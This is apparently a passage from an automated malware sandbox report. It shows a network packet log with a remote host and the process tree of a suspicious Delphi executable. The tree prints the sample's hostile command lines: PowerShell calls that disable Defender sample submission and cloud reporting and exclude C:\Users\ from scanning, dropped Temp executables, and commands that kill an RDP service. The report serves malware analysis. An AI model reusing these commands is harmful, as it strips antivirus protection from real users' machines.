Sep 24, 2024 17:46:13.244916916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244927883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.247234106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247270107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.247277975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247289896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247315884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.247428894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247442007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247452974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247463942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247493029 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.247524023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.247535944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.247976065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248008013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248035908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248045921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248080015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248172998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248184919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248197079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248209000 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248218060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248255014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248711109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248723030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248735905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248758078 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248859882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248872042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248884916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248897076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.248905897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.248927116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.249015093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249027014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249038935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249049902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.249061108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249080896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.249206066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249217987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249228954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.249241114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.249269962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.250293016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250324011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250338078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250361919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.250495911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250509024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250520945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250530958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.250543118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.250562906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261091948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261106014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261120081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261156082 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261182070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261197090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261204004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261214972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261228085 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261235952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261272907 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261313915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261387110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261399031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261409998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261420965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261430979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261450052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261646032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261658907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261682987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261852026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261862993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261892080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261909962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261920929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261934996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261948109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.261959076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261970043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.261991024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.262008905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.309293985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309308052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309319973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309393883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.309420109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309437037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309448957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309463978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.309468985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.309493065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.341437101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341545105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.341566086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341578960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341710091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.341749907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341762066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341783047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341794968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.341826916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.341887951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346529961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346543074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346556902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346605062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346630096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346640110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346652985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346664906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346673965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346688986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346694946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346724033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346883059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346894979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346906900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346920013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346941948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346951008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346965075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.346975088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.346987009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347001076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347008944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347034931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347189903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347296000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347309113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347320080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347330093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347340107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347349882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347358942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347371101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347393990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347399950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347410917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347429991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347676992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347688913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347703934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347723007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347748041 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347887993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347899914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347910881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347925901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347938061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347946882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347961903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.347968102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.347978115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348006010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.348133087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348170042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.348189116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348203897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348236084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.348565102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348576069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348588943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348602057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.348613024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.348639011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352015972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352027893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352041006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352093935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352142096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352153063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352165937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352180958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352186918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352210045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352350950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352389097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352480888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352492094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352543116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352639914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352652073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352662086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352674007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352686882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352720022 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352751017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.352895975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.352933884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353008986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353020906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353032112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353045940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353058100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353064060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353075981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353085041 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353095055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353106976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353115082 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353148937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353282928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353363991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353374004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353387117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353400946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.353406906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.353419065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.355326891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355338097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355350971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355413914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.355448961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355458975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355470896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355483055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.355688095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375037909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375060081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375077009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375111103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375135899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375174046 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375312090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375329971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375344992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375358105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375368118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375396013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375497103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375509024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375521898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375535011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375544071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375554085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375566006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375577927 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375587940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375605106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375612020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.375622988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.375637054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.376044035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.376056910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.376070976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.376082897 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.376105070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.402276993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.402307987 CEST	1120	49730	64.95.13.143	192.168.2.4

Target ID:	0
Start time:	11:46:03
Start date:	24/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	11'950'592 bytes
MD5 hash:	54A1448DF6E33D7032232DD1D896BC68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:46:04
Start date:	24/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	11'950'592 bytes
MD5 hash:	54A1448DF6E33D7032232DD1D896BC68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:46:07
Start date:	24/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"
Imagebase:	0x7ff75d060000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:46:07
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:46:07
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:46:08
Start date:	24/09/2024
Path:	C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe"
Imagebase:	0x7ff73afb0000
File size:	98'304 bytes
MD5 hash:	319865D78CC8DF6270E27521B8182BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:46:16
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:46:19
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:46:23
Start date:	24/09/2024
Path:	C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe"
Imagebase:	0x7ff6ce980000
File size:	10'639'360 bytes
MD5 hash:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 19%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:	0x7ff6a4e50000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe stop RDP-Controller
Imagebase:	0x7ff734ee0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:46:27
Start date:	24/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
